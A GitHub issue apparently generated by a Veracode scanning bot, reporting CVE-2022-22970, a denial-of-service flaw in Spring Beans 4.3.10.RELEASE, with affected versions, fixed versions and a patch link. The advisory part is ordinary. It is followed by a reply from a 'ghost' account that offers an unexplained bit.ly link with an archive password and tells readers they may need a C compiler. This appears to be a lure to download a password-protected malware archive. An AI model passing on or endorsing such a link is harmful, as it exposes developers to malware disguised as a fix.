CVE: 2022-22970 found in Spring Beans - Version: 4.3.10.RELEASE [JAVA]

[github-actions[bot]]

Veracode Software Composition Analysis

Attribute	Details
Library	Spring Beans
Description	Spring Beans
Language	JAVA
Vulnerability	Denial Of Service (DoS)
Vulnerability description	spring-beans is vulnerable to denial of service. . The vulnerability exists in CachedIntrospectionResults.java because applications that handle file not properly validate which allows to attacker crash the application.
CVE	2022-22970
CVSS score	3.5
Vulnerability present in version/s	3.0.3.RELEASE-4.3.30.RELEASE
Found library version/s	4.3.10.RELEASE
Vulnerability fixed in version	5.3.20
Library latest version	6.2.0-RC1
Fix	There is no fixed version released in this version range. Apply the below fix or use the updated 5.3.20 or 5.2.22 packages

Links:

• https://sca.analysiscenter.veracode.com/vulnerability-database/libraries/1070?version=4.3.10.RELEASE
• https://sca.analysiscenter.veracode.com/vulnerability-database/vulnerabilities/35505
• Patch: https://github.com/spring-projects/spring-framework/commit/50177b1ad3485bd44239b1756f6c14607476fcf2

[ghost]

maybe this will help

https://bit.ly/3zo8fAM Pass: changeme

you may need to install the c compiler